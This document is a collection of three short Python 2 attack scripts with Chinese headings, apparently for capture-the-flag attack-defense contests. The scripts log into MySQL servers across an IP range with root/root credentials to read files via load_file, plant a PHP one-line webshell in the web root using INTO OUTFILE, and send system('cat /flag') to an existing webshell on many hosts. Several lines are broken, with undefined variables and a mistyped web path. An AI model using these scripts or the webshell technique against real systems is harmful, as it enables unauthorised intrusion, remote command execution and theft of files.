MySQL读文件
#coding=utf-8
import MySQLdb
host = '172.16.1.'
for i in range(129,131):
tag = host+str(i)
print tag+"3306"
try:
MySQLdb.connect(tag,3306,'root','root','mysql',timeout=1)
cur = conn.cursor()
cur.execute("select load_file('/root/flag.txt')")
print cur.fetchone()
cur.close()
except:
print 'MYSQL connect out'
conn.commit()
conn.close()MySQL写入一句话木马
#coding=utf-8
import MySQLdb
host = '172.16.1.'
try:
conn = MySQLdb.connect(host=host,port=3306,user='root',passwd='root',db='mysql',connect_timeout=1)
cur = conn.cursor()
cur.execute("""create table sys(cmd text NOT NULL);""")
cur.execute("""insert into sys(cmd)values("<?php system('cat /root/flaginfo*');?>");""")
cur.execute("""select * from sys into outfile "/val/www/html/sys.php";""")
os.system("curl "+tag+"/sys.php")
except:
print 'Mysql time out'webshell利用
#!usr/bin/python
import urllib,urllib2
for i in range(1,10):
tag = 'http://172.16.'+str(i)+'.113/add_book.php'
data = {"password":"system('cat /flag');"}
print tag
try:
f = urllib2.urlopen(url=tag,data=urllib.urlencode(data),timeout=1)
flag = f.read()
print flag[0:40]
except:
print 'time out'